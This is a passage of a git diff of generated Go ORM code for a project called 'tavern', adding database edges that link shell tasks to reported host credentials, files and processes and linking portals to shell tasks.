RemoveReportedCredentialIDs removes the "reported_credentials" edge to the HostCredential entity by IDs. +func (m *ShellTaskMutation) RemoveReportedCredentialIDs(ids ...int) { + if m.removedreported_credentials == nil { + m.removedreported_credentials = make(map[int]struct{}) + } + for i := range ids { + delete(m.reported_credentials, ids[i]) + m.removedreported_credentials[ids[i]] = struct{}{} + } +} + +// RemovedReportedCredentials returns the removed IDs of the "reported_credentials" edge to the HostCredential entity. +func (m *ShellTaskMutation) RemovedReportedCredentialsIDs() (ids []int) { + for id := range m.removedreported_credentials { + ids = append(ids, id) + } + return +} + +// ReportedCredentialsIDs returns the "reported_credentials" edge IDs in the mutation. +func (m *ShellTaskMutation) ReportedCredentialsIDs() (ids []int) { + for id := range m.reported_credentials { + ids = append(ids, id) + } + return +} + +// ResetReportedCredentials resets all changes to the "reported_credentials" edge. +func (m *ShellTaskMutation) ResetReportedCredentials() { + m.reported_credentials = nil + m.clearedreported_credentials = false + m.removedreported_credentials = nil +} + +// AddReportedFileIDs adds the "reported_files" edge to the HostFile entity by ids. +func (m *ShellTaskMutation) AddReportedFileIDs(ids ...int) { + if m.reported_files == nil { + m.reported_files = make(map[int]struct{}) + } + for i := range ids { + m.reported_files[ids[i]] = struct{}{} + } +} + +// ClearReportedFiles clears the "reported_files" edge to the HostFile entity. +func (m *ShellTaskMutation) ClearReportedFiles() { + m.clearedreported_files = true +} + +// ReportedFilesCleared reports if the "reported_files" edge to the HostFile entity was cleared. +func (m *ShellTaskMutation) ReportedFilesCleared() bool { + return m.clearedreported_files +} + +// RemoveReportedFileIDs removes the "reported_files" edge to the HostFile entity by IDs. +func (m *ShellTaskMutation) RemoveReportedFileIDs(ids ...int) { + if m.removedreported_files == nil { + m.removedreported_files = make(map[int]struct{}) + } + for i := range ids { + delete(m.reported_files, ids[i]) + m.removedreported_files[ids[i]] = struct{}{} + } +} + +// RemovedReportedFiles returns the removed IDs of the "reported_files" edge to the HostFile entity. +func (m *ShellTaskMutation) RemovedReportedFilesIDs() (ids []int) { + for id := range m.removedreported_files { + ids = append(ids, id) + } + return +} + +// ReportedFilesIDs returns the "reported_files" edge IDs in the mutation. +func (m *ShellTaskMutation) ReportedFilesIDs() (ids []int) { + for id := range m.reported_files { + ids = append(ids, id) + } + return +} + +// ResetReportedFiles resets all changes to the "reported_files" edge. +func (m *ShellTaskMutation) ResetReportedFiles() { + m.reported_files = nil + m.clearedreported_files = false + m.removedreported_files = nil +} + +// AddReportedProcessIDs adds the "reported_processes" edge to the HostProcess entity by ids. +func (m *ShellTaskMutation) AddReportedProcessIDs(ids ...int) { + if m.reported_processes == nil { + m.reported_processes = make(map[int]struct{}) + } + for i := range ids { + m.reported_processes[ids[i]] = struct{}{} + } +} + +// ClearReportedProcesses clears the "reported_processes" edge to the HostProcess entity. +func (m *ShellTaskMutation) ClearReportedProcesses() { + m.clearedreported_processes = true +} + +// ReportedProcessesCleared reports if the "reported_processes" edge to the HostProcess entity was cleared. +func (m *ShellTaskMutation) ReportedProcessesCleared() bool { + return m.clearedreported_processes +} + +// RemoveReportedProcessIDs removes the "reported_processes" edge to the HostProcess entity by IDs. +func (m *ShellTaskMutation) RemoveReportedProcessIDs(ids ...int) { + if m.removedreported_processes == nil { + m.removedreported_processes = make(map[int]struct{}) + } + for i := range ids { + delete(m.reported_processes, ids[i]) + m.removedreported_processes[ids[i]] = struct{}{} + } +} + +// RemovedReportedProcesses returns the removed IDs of the "reported_processes" edge to the HostProcess entity. +func (m *ShellTaskMutation) RemovedReportedProcessesIDs() (ids []int) { + for id := range m.removedreported_processes { + ids = append(ids, id) + } + return +} + +// ReportedProcessesIDs returns the "reported_processes" edge IDs in the mutation. +func (m *ShellTaskMutation) ReportedProcessesIDs() (ids []int) { + for id := range m.reported_processes { + ids = append(ids, id) + } + return +} + +// ResetReportedProcesses resets all changes to the "reported_processes" edge. +func (m *ShellTaskMutation) ResetReportedProcesses() { + m.reported_processes = nil + m.clearedreported_processes = false + m.removedreported_processes = nil +} + // Where appends a list predicates to the ShellTaskMutation builder. func (m *ShellTaskMutation) Where(ps ...predicate.ShellTask) { m.predicates = append(m.predicates, ps...) @@ -13628,13 +14035,22 @@ func (m *ShellTaskMutation) ResetField(name string) error { // AddedEdges returns all edge names that were set/added in this mutation. func (m *ShellTaskMutation) AddedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 5) if m.shell != nil { edges = append(edges, shelltask.EdgeShell) } if m.creator != nil { edges = append(edges, shelltask.EdgeCreator) } + if m.reported_credentials != nil { + edges = append(edges, shelltask.EdgeReportedCredentials) + } + if m.reported_files != nil { + edges = append(edges, shelltask.EdgeReportedFiles) + } + if m.reported_processes != nil { + edges = append(edges, shelltask.EdgeReportedProcesses) + } return edges } @@ -13650,31 +14066,87 @@ func (m *ShellTaskMutation) AddedIDs(name string) []ent.Value { if id := m.creator; id != nil { return []ent.Value{*id} } + case shelltask.EdgeReportedCredentials: + ids := make([]ent.Value, 0, len(m.reported_credentials)) + for id := range m.reported_credentials { + ids = append(ids, id) + } + return ids + case shelltask.EdgeReportedFiles: + ids := make([]ent.Value, 0, len(m.reported_files)) + for id := range m.reported_files { + ids = append(ids, id) + } + return ids + case shelltask.EdgeReportedProcesses: + ids := make([]ent.Value, 0, len(m.reported_processes)) + for id := range m.reported_processes { + ids = append(ids, id) + } + return ids } return nil } // RemovedEdges returns all edge names that were removed in this mutation. func (m *ShellTaskMutation) RemovedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 5) + if m.removedreported_credentials != nil { + edges = append(edges, shelltask.EdgeReportedCredentials) + } + if m.removedreported_files != nil { + edges = append(edges, shelltask.EdgeReportedFiles) + } + if m.removedreported_processes != nil { + edges = append(edges, shelltask.EdgeReportedProcesses) + } return edges } // RemovedIDs returns all IDs (to other nodes) that were removed for the edge with // the given name in this mutation. func (m *ShellTaskMutation) RemovedIDs(name string) []ent.Value { + switch name { + case shelltask.EdgeReportedCredentials: + ids := make([]ent.Value, 0, len(m.removedreported_credentials)) + for id := range m.removedreported_credentials { + ids = append(ids, id) + } + return ids + case shelltask.EdgeReportedFiles: + ids := make([]ent.Value, 0, len(m.removedreported_files)) + for id := range m.removedreported_files { + ids = append(ids, id) + } + return ids + case shelltask.EdgeReportedProcesses: + ids := make([]ent.Value, 0, len(m.removedreported_processes)) + for id := range m.removedreported_processes { + ids = append(ids, id) + } + return ids + } return nil } // ClearedEdges returns all edge names that were cleared in this mutation. func (m *ShellTaskMutation) ClearedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 5) if m.clearedshell { edges = append(edges, shelltask.EdgeShell) } if m.clearedcreator { edges = append(edges, shelltask.EdgeCreator) } + if m.clearedreported_credentials { + edges = append(edges, shelltask.EdgeReportedCredentials) + } + if m.clearedreported_files { + edges = append(edges, shelltask.EdgeReportedFiles) + } + if m.clearedreported_processes { + edges = append(edges, shelltask.EdgeReportedProcesses) + } return edges } @@ -13686,6 +14158,12 @@ func (m *ShellTaskMutation) EdgeCleared(name string) bool { return m.clearedshell case shelltask.EdgeCreator: return m.clearedcreator + case shelltask.EdgeReportedCredentials: + return m.clearedreported_credentials + case shelltask.EdgeReportedFiles: + return m.clearedreported_files + case shelltask.EdgeReportedProcesses: + return m.clearedreported_processes } return false } @@ -13714,6 +14192,15 @@ func (m *ShellTaskMutation) ResetEdge(name string) error { case shelltask.EdgeCreator: m.ResetCreator() return nil + case shelltask.EdgeReportedCredentials: + m.ResetReportedCredentials() + return nil + case shelltask.EdgeReportedFiles: + m.ResetReportedFiles() + return nil + case shelltask.EdgeReportedProcesses: + m.ResetReportedProcesses() + return nil } return fmt.Errorf("unknown ShellTask edge %s", name) } diff --git a/tavern/internal/ent/portal.go b/tavern/internal/ent/portal.go index be7c36381..b321662fa 100644 --- a/tavern/internal/ent/portal.go +++ b/tavern/internal/ent/portal.go @@ -11,6 +11,7 @@ import ( "entgo.io/ent/dialect/sql" "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/portal" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" "realm.pub/tavern/internal/ent/user" ) @@ -28,18 +29,21 @@ type Portal struct { ClosedAt time.Time `json:"closed_at,omitempty"` // Edges holds the relations/edges for other nodes in the graph. // The values are being populated by the PortalQuery when eager-loading is set. - Edges PortalEdges `json:"edges"` - portal_task *int - portal_beacon *int - portal_owner *int - shell_portals *int - selectValues sql.SelectValues + Edges PortalEdges `json:"edges"` + portal_task *int + portal_shell_task *int + portal_beacon *int + portal_owner *int + shell_portals *int + selectValues sql.SelectValues } // PortalEdges holds the relations/edges for other nodes in the graph. type PortalEdges struct { // Task that created the portal Task *Task `json:"task,omitempty"` + // ShellTask that created the portal + ShellTask *ShellTask `json:"shell_task,omitempty"` // Beacon that created the portal Beacon *Beacon `json:"beacon,omitempty"` // User that created the portal @@ -48,9 +52,9 @@ type PortalEdges struct { ActiveUsers []*User `json:"active_users,omitempty"` // loadedTypes holds the information for reporting if a // type was loaded (or requested) in eager-loading or not. - loadedTypes [4]bool + loadedTypes [5]bool // totalCount holds the count of the edges above. - totalCount [4]map[string]int + totalCount [5]map[string]int namedActiveUsers map[string][]*User } @@ -66,12 +70,23 @@ func (e PortalEdges) TaskOrErr() (*Task, error) { return nil, &NotLoadedError{edge: "task"} } +// ShellTaskOrErr returns the ShellTask value or an error if the edge +// was not loaded in eager-loading, or loaded but was not found. +func (e PortalEdges) ShellTaskOrErr() (*ShellTask, error) { + if e.ShellTask != nil { + return e.ShellTask, nil + } else if e.loadedTypes[1] { + return nil, &NotFoundError{label: shelltask.Label} + } + return nil, &NotLoadedError{edge: "shell_task"} +} + // BeaconOrErr returns the Beacon value or an error if the edge // was not loaded in eager-loading, or loaded but was not found. func (e PortalEdges) BeaconOrErr() (*Beacon, error) { if e.Beacon != nil { return e.Beacon, nil - } else if e.loadedTypes[1] { + } else if e.loadedTypes[2] { return nil, &NotFoundError{label: beacon.Label} } return nil, &NotLoadedError{edge: "beacon"} @@ -82,7 +97,7 @@ func (e PortalEdges) BeaconOrErr() (*Beacon, error) { func (e PortalEdges) OwnerOrErr() (*User, error) { if e.Owner != nil { return e.Owner, nil - } else if e.loadedTypes[2] { + } else if e.loadedTypes[3] { return nil, &NotFoundError{label: user.Label} } return nil, &NotLoadedError{edge: "owner"} @@ -91,7 +106,7 @@ func (e PortalEdges) OwnerOrErr() (*User, error) { // ActiveUsersOrErr returns the ActiveUsers value or an error if the edge // was not loaded in eager-loading. func (e PortalEdges) ActiveUsersOrErr() ([]*User, error) { - if e.loadedTypes[3] { + if e.loadedTypes[4] { return e.ActiveUsers, nil } return nil, &NotLoadedError{edge: "active_users"} @@ -108,11 +123,13 @@ func (*Portal) scanValues(columns []string) ([]any, error) { values[i] = new(sql.NullTime) case portal.ForeignKeys[0]: // portal_task values[i] = new(sql.NullInt64) - case portal.ForeignKeys[1]: // portal_beacon + case portal.ForeignKeys[1]: // portal_shell_task + values[i] = new(sql.NullInt64) + case portal.ForeignKeys[2]: // portal_beacon values[i] = new(sql.NullInt64) - case portal.ForeignKeys[2]: // portal_owner + case portal.ForeignKeys[3]: // portal_owner values[i] = new(sql.NullInt64) - case portal.ForeignKeys[3]: // shell_portals + case portal.ForeignKeys[4]: // shell_portals values[i] = new(sql.NullInt64) default: values[i] = new(sql.UnknownType) @@ -161,20 +178,27 @@ func (po *Portal) assignValues(columns []string, values []any) error { *po.portal_task = int(value.Int64) } case portal.ForeignKeys[1]: + if value, ok := values[i].(*sql.NullInt64); !ok { + return fmt.Errorf("unexpected type %T for edge-field portal_shell_task", value) + } else if value.Valid { + po.portal_shell_task = new(int) + *po.portal_shell_task = int(value.Int64) + } + case portal.ForeignKeys[2]: if value, ok := values[i].(*sql.NullInt64); !ok { return fmt.Errorf("unexpected type %T for edge-field portal_beacon", value) } else if value.Valid { po.portal_beacon = new(int) *po.portal_beacon = int(value.Int64) } - case portal.ForeignKeys[2]: + case portal.ForeignKeys[3]: if value, ok := values[i].(*sql.NullInt64); !ok { return fmt.Errorf("unexpected type %T for edge-field portal_owner", value) } else if value.Valid { po.portal_owner = new(int) *po.portal_owner = int(value.Int64) } - case portal.ForeignKeys[3]: + case portal.ForeignKeys[4]: if value, ok := values[i].(*sql.NullInt64); !ok { return fmt.Errorf("unexpected type %T for edge-field shell_portals", value) } else if value.Valid { @@ -199,6 +223,11 @@ func (po *Portal) QueryTask() *TaskQuery { return NewPortalClient(po.config).QueryTask(po) } +// QueryShellTask queries the "shell_task" edge of the Portal entity. +func (po *Portal) QueryShellTask() *ShellTaskQuery { + return NewPortalClient(po.config).QueryShellTask(po) +} + // QueryBeacon queries the "beacon" edge of the Portal entity. func (po *Portal) QueryBeacon() *BeaconQuery { return NewPortalClient(po.config).QueryBeacon(po) diff --git a/tavern/internal/ent/portal/portal.go b/tavern/internal/ent/portal/portal.go index 8a7d5cc1d..1b834aeb4 100644 --- a/tavern/internal/ent/portal/portal.go +++ b/tavern/internal/ent/portal/portal.go @@ -22,6 +22,8 @@ const ( FieldClosedAt = "closed_at" // EdgeTask holds the string denoting the task edge name in mutations. EdgeTask = "task" + // EdgeShellTask holds the string denoting the shell_task edge name in mutations. + EdgeShellTask = "shell_task" // EdgeBeacon holds the string denoting the beacon edge name in mutations. EdgeBeacon = "beacon" // EdgeOwner holds the string denoting the owner edge name in mutations. @@ -37,6 +39,13 @@ const ( TaskInverseTable = "tasks" // TaskColumn is the table column denoting the task relation/edge. TaskColumn = "portal_task" + // ShellTaskTable is the table that holds the shell_task relation/edge. + ShellTaskTable = "portals" + // ShellTaskInverseTable is the table name for the ShellTask entity. + // It exists in this package in order to avoid circular dependency with the "shelltask" package. + ShellTaskInverseTable = "shell_tasks" + // ShellTaskColumn is the table column denoting the shell_task relation/edge. + ShellTaskColumn = "portal_shell_task" // BeaconTable is the table that holds the beacon relation/edge. BeaconTable = "portals" // BeaconInverseTable is the table name for the Beacon entity. @@ -72,6 +81,7 @@ var Columns = []string{ // table and are not defined as standalone fields in the schema. var ForeignKeys = []string{ "portal_task", + "portal_shell_task", "portal_beacon", "portal_owner", "shell_portals", @@ -131,6 +141,13 @@ func ByTaskField(field string, opts ...sql.OrderTermOption) OrderOption { } } +// ByShellTaskField orders the results by shell_task field. +func ByShellTaskField(field string, opts ...sql.OrderTermOption) OrderOption { + return func(s *sql.Selector) { + sqlgraph.OrderByNeighborTerms(s, newShellTaskStep(), sql.OrderByField(field, opts...)) + } +} + // ByBeaconField orders the results by beacon field. func ByBeaconField(field string, opts ...sql.OrderTermOption) OrderOption { return func(s *sql.Selector) { @@ -165,6 +182,13 @@ func newTaskStep() *sqlgraph.Step { sqlgraph.Edge(sqlgraph.M2O, false, TaskTable, TaskColumn), ) } +func newShellTaskStep() *sqlgraph.Step { + return sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.To(ShellTaskInverseTable, FieldID), + sqlgraph.Edge(sqlgraph.M2O, false, ShellTaskTable, ShellTaskColumn), + ) +} func newBeaconStep() *sqlgraph.Step { return sqlgraph.NewStep( sqlgraph.From(Table, FieldID), diff --git a/tavern/internal/ent/portal/where.go b/tavern/internal/ent/portal/where.go index e63244231..1641ed7da 100644 --- a/tavern/internal/ent/portal/where.go +++ b/tavern/internal/ent/portal/where.go @@ -223,6 +223,29 @@ func HasTaskWith(preds ...predicate.Task) predicate.Portal { }) } +// HasShellTask applies the HasEdge predicate on the "shell_task" edge. +func HasShellTask() predicate.Portal { + return predicate.Portal(func(s *sql.Selector) { + step := sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.Edge(sqlgraph.M2O, false, ShellTaskTable, ShellTaskColumn), + ) + sqlgraph.HasNeighbors(s, step) + }) +} + +// HasShellTaskWith applies the HasEdge predicate on the "shell_task" edge with a given conditions (other predicates). +func HasShellTaskWith(preds ...predicate.ShellTask) predicate.Portal { + return predicate.Portal(func(s *sql.Selector) { + step := newShellTaskStep() + sqlgraph.HasNeighborsWith(s, step, func(s *sql.Selector) { + for _, p := range preds { + p(s) + } + }) + }) +} + // HasBeacon applies the HasEdge predicate on the "beacon" edge. func HasBeacon() predicate.Portal { return predicate.Portal(func(s *sql.Selector) { diff --git a/tavern/internal/ent/portal_create.go b/tavern/internal/ent/portal_create.go index b7fb11678..310f6354f 100644 --- a/tavern/internal/ent/portal_create.go +++ b/tavern/internal/ent/portal_create.go @@ -13,6 +13,7 @@ import ( "entgo.io/ent/schema/field" "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/portal" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" "realm.pub/tavern/internal/ent/user" ) @@ -73,11 +74,38 @@ func (pc *PortalCreate) SetTaskID(id int) *PortalCreate { return pc } +// SetNillableTaskID sets the "task" edge to the Task entity by ID if the given value is not nil. +func (pc *PortalCreate) SetNillableTaskID(id *int) *PortalCreate { + if id != nil { + pc = pc.SetTaskID(*id) + } + return pc +} + // SetTask sets the "task" edge to the Task entity. func (pc *PortalCreate) SetTask(t *Task) *PortalCreate { return pc.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (pc *PortalCreate) SetShellTaskID(id int) *PortalCreate { + pc.mutation.SetShellTaskID(id) + return pc +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (pc *PortalCreate) SetNillableShellTaskID(id *int) *PortalCreate { + if id != nil { + pc = pc.SetShellTaskID(*id) + } + return pc +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (pc *PortalCreate) SetShellTask(s *ShellTask) *PortalCreate { + return pc.SetShellTaskID(s.ID) +} + // SetBeaconID sets the "beacon" edge to the Beacon entity by ID. func (pc *PortalCreate) SetBeaconID(id int) *PortalCreate { pc.mutation.SetBeaconID(id) @@ -168,9 +196,6 @@ func (pc *PortalCreate) check() error { if _, ok := pc.mutation.LastModifiedAt(); !ok { return &ValidationError{Name: "last_modified_at", err: errors.New(`ent: missing required field "Portal.last_modified_at"`)} } - if len(pc.mutation.TaskIDs()) == 0 { - return &ValidationError{Name: "task", err: errors.New(`ent: missing required edge "Portal.task"`)} - } if len(pc.mutation.BeaconIDs()) == 0 { return &ValidationError{Name: "beacon", err: errors.New(`ent: missing required edge "Portal.beacon"`)} } @@ -233,6 +258,23 @@ func (pc *PortalCreate) createSpec() (*Portal, *sqlgraph.CreateSpec) { _node.portal_task = &nodes[0] _spec.Edges = append(_spec.Edges, edge) } + if nodes := pc.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: false, + Table: portal.ShellTaskTable, + Columns: []string{portal.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _node.portal_shell_task = &nodes[0] + _spec.Edges = append(_spec.Edges, edge) + } if nodes := pc.mutation.BeaconIDs(); len(nodes) > 0 { edge := &sqlgraph.EdgeSpec{ Rel: sqlgraph.M2O, diff --git a/tavern/internal/ent/portal_query.go b/tavern/internal/ent/portal_query.go index ce3635bf6..281f92280 100644 --- a/tavern/internal/ent/portal_query.go +++ b/tavern/internal/ent/portal_query.go @@ -15,6 +15,7 @@ import ( "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/portal" "realm.pub/tavern/internal/ent/predicate" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" "realm.pub/tavern/internal/ent/user" ) @@ -27,6 +28,7 @@ type PortalQuery struct { inters []Interceptor predicates []predicate.Portal withTask *TaskQuery + withShellTask *ShellTaskQuery withBeacon *BeaconQuery withOwner *UserQuery withActiveUsers *UserQuery @@ -92,6 +94,28 @@ func (pq *PortalQuery) QueryTask() *TaskQuery { return query } +// QueryShellTask chains the current query on the "shell_task" edge. +func (pq *PortalQuery) QueryShellTask() *ShellTaskQuery { + query := (&ShellTaskClient{config: pq.config}).Query() + query.path = func(ctx context.Context) (fromU *sql.Selector, err error) { + if err := pq.prepareQuery(ctx); err != nil { + return nil, err + } + selector := pq.sqlQuery(ctx) + if err := selector.Err(); err != nil { + return nil, err + } + step := sqlgraph.NewStep( + sqlgraph.From(portal.Table, portal.FieldID, selector), + sqlgraph.To(shelltask.Table, shelltask.FieldID), + sqlgraph.Edge(sqlgraph.M2O, false, portal.ShellTaskTable, portal.ShellTaskColumn), + ) + fromU = sqlgraph.SetNeighbors(pq.driver.Dialect(), step) + return fromU, nil + } + return query +} + // QueryBeacon chains the current query on the "beacon" edge. func (pq *PortalQuery) QueryBeacon() *BeaconQuery { query := (&BeaconClient{config: pq.config}).Query() @@ -351,6 +375,7 @@ func (pq *PortalQuery) Clone() *PortalQuery { inters: append([]Interceptor{}, pq.inters...), predicates: append([]predicate.Portal{}, pq.predicates...), withTask: pq.withTask.Clone(), + withShellTask: pq.withShellTask.Clone(), withBeacon: pq.withBeacon.Clone(), withOwner: pq.withOwner.Clone(), withActiveUsers: pq.withActiveUsers.Clone(), @@ -371,6 +396,17 @@ func (pq *PortalQuery) WithTask(opts ...func(*TaskQuery)) *PortalQuery { return pq } +// WithShellTask tells the query-builder to eager-load the nodes that are connected to +// the "shell_task" edge. The optional arguments are used to configure the query builder of the edge. +func (pq *PortalQuery) WithShellTask(opts ...func(*ShellTaskQuery)) *PortalQuery { + query := (&ShellTaskClient{config: pq.config}).Query() + for _, opt := range opts { + opt(query) + } + pq.withShellTask = query + return pq +} + // WithBeacon tells the query-builder to eager-load the nodes that are connected to // the "beacon" edge. The optional arguments are used to configure the query builder of the edge. func (pq *PortalQuery) WithBeacon(opts ...func(*BeaconQuery)) *PortalQuery { @@ -483,14 +519,15 @@ func (pq *PortalQuery) sqlAll(ctx context.Context, hooks ...queryHook) ([]*Porta nodes = []*Portal{} withFKs = pq.withFKs _spec = pq.querySpec() - loadedTypes = [4]bool{ + loadedTypes = [5]bool{ pq.withTask != nil, + pq.withShellTask != nil, pq.withBeacon != nil, pq.withOwner != nil, pq.withActiveUsers != nil, } ) - if pq.withTask != nil || pq.withBeacon != nil || pq.withOwner != nil { + if pq.withTask != nil || pq.withShellTask != nil || pq.withBeacon != nil || pq.withOwner != nil { withFKs = true } if withFKs { @@ -523,6 +560,12 @@ func (pq *PortalQuery) sqlAll(ctx context.Context, hooks ...queryHook) ([]*Porta return nil, err } } + if query := pq.withShellTask; query != nil { + if err := pq.loadShellTask(ctx, query, nodes, nil, + func(n *Portal, e *ShellTask) { n.Edges.ShellTask = e }); err != nil { + return nil, err + } + } if query := pq.withBeacon; query != nil { if err := pq.loadBeacon(ctx, query, nodes, nil, func(n *Portal, e *Beacon) { n.Edges.Beacon = e }); err != nil { @@ -589,6 +632,38 @@ func (pq *PortalQuery) loadTask(ctx context.Context, query *TaskQuery, nodes []* } return nil } +func (pq *PortalQuery) loadShellTask(ctx context.Context, query *ShellTaskQuery, nodes []*Portal, init func(*Portal), assign func(*Portal, *ShellTask)) error { + ids := make([]int, 0, len(nodes)) + nodeids := make(map[int][]*Portal) + for i := range nodes { + if nodes[i].portal_shell_task == nil { + continue + } + fk := *nodes[i].portal_shell_task + if _, ok := nodeids[fk]; !ok { + ids = append(ids, fk) + } + nodeids[fk] = append(nodeids[fk], nodes[i]) + } + if len(ids) == 0 { + return nil + } + query.Where(shelltask.IDIn(ids...)) + neighbors, err := query.All(ctx) + if err != nil { + return err + } + for _, n := range neighbors { + nodes, ok := nodeids[n.ID] + if !ok { + return fmt.Errorf(`unexpected foreign-key "portal_shell_task" returned %v`, n.ID) + } + for i := range nodes { + assign(nodes[i], n) + } + } + return nil +} func (pq *PortalQuery) loadBeacon(ctx context.Context, query *BeaconQuery, nodes []*Portal, init func(*Portal), assign func(*Portal, *Beacon)) error { ids := make([]int, 0, len(nodes)) nodeids := make(map[int][]*Portal) diff --git a/tavern/internal/ent/portal_update.go b/tavern/internal/ent/portal_update.go index 45d8981f5..b6ae2d152 100644 --- a/tavern/internal/ent/portal_update.go +++ b/tavern/internal/ent/portal_update.go @@ -14,6 +14,7 @@ import ( "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/portal" "realm.pub/tavern/internal/ent/predicate" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" "realm.pub/tavern/internal/ent/user" ) @@ -63,11 +64,38 @@ func (pu *PortalUpdate) SetTaskID(id int) *PortalUpdate { return pu } +// SetNillableTaskID sets the "task" edge to the Task entity by ID if the given value is not nil. +func (pu *PortalUpdate) SetNillableTaskID(id *int) *PortalUpdate { + if id != nil { + pu = pu.SetTaskID(*id) + } + return pu +} + // SetTask sets the "task" edge to the Task entity. func (pu *PortalUpdate) SetTask(t *Task) *PortalUpdate { return pu.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (pu *PortalUpdate) SetShellTaskID(id int) *PortalUpdate { + pu.mutation.SetShellTaskID(id) + return pu +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (pu *PortalUpdate) SetNillableShellTaskID(id *int) *PortalUpdate { + if id != nil { + pu = pu.SetShellTaskID(*id) + } + return pu +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (pu *PortalUpdate) SetShellTask(s *ShellTask) *PortalUpdate { + return pu.SetShellTaskID(s.ID) +} + // SetBeaconID sets the "beacon" edge to the Beacon entity by ID. func (pu *PortalUpdate) SetBeaconID(id int) *PortalUpdate { pu.mutation.SetBeaconID(id) @@ -116,6 +144,12 @@ func (pu *PortalUpdate) ClearTask() *PortalUpdate { return pu } +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (pu *PortalUpdate) ClearShellTask() *PortalUpdate { + pu.mutation.ClearShellTask() + return pu +} + // ClearBeacon clears the "beacon" edge to the Beacon entity. func (pu *PortalUpdate) ClearBeacon() *PortalUpdate { pu.mutation.ClearBeacon() @@ -187,9 +221,6 @@ func (pu *PortalUpdate) defaults() { // check runs all checks and user-defined validators on the builder. func (pu *PortalUpdate) check() error { - if pu.mutation.TaskCleared() && len(pu.mutation.TaskIDs()) > 0 { - return errors.New(`ent: clearing a required unique edge "Portal.task"`) - } if pu.mutation.BeaconCleared() && len(pu.mutation.BeaconIDs()) > 0 { return errors.New(`ent: clearing a required unique edge "Portal.beacon"`) } @@ -249,6 +280,35 @@ func (pu *PortalUpdate) sqlSave(ctx context.Context) (n int, err error) { } _spec.Edges.Add = append(_spec.Edges.Add, edge) } + if pu.mutation.ShellTaskCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: false, + Table: portal.ShellTaskTable, + Columns: []string{portal.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := pu.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: false, + Table: portal.ShellTaskTable, + Columns: []string{portal.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } if pu.mutation.BeaconCleared() { edge := &sqlgraph.EdgeSpec{ Rel: sqlgraph.M2O, @@ -404,11 +464,38 @@ func (puo *PortalUpdateOne) SetTaskID(id int) *PortalUpdateOne { return puo } +// SetNillableTaskID sets the "task" edge to the Task entity by ID if the given value is not nil. +func (puo *PortalUpdateOne) SetNillableTaskID(id *int) *PortalUpdateOne { + if id != nil { + puo = puo.SetTaskID(*id) + } + return puo +} + // SetTask sets the "task" edge to the Task entity. func (puo *PortalUpdateOne) SetTask(t *Task) *PortalUpdateOne { return puo.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (puo *PortalUpdateOne) SetShellTaskID(id int) *PortalUpdateOne { + puo.mutation.SetShellTaskID(id) + return puo +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (puo *PortalUpdateOne) SetNillableShellTaskID(id *int) *PortalUpdateOne { + if id != nil { + puo = puo.SetShellTaskID(*id) + } + return puo +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (puo *PortalUpdateOne) SetShellTask(s *ShellTask) *PortalUpdateOne { + return puo.SetShellTaskID(s.ID) +} + // SetBeaconID sets the "beacon" edge to the Beacon entity by ID. func (puo *PortalUpdateOne) SetBeaconID(id int) *PortalUpdateOne { puo.mutation.SetBeaconID(id) @@ -457,6 +544,12 @@ func (puo *PortalUpdateOne) ClearTask() *PortalUpdateOne { return puo } +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (puo *PortalUpdateOne) ClearShellTask() *PortalUpdateOne { + puo.mutation.ClearShellTask() + return puo +} + // ClearBeacon clears the "beacon" edge to the Beacon entity. func (puo *PortalUpdateOne) ClearBeacon() *PortalUpdateOne { puo.mutation.ClearBeacon() @@ -541,9 +634,6 @@ func (puo *PortalUpdateOne) defaults() { // check runs all checks and user-defined validators on the builder. func (puo *PortalUpdateOne) check() error { - if puo.mutation.TaskCleared() && len(puo.mutation.TaskIDs()) > 0 { - return errors.New(`ent: clearing a required 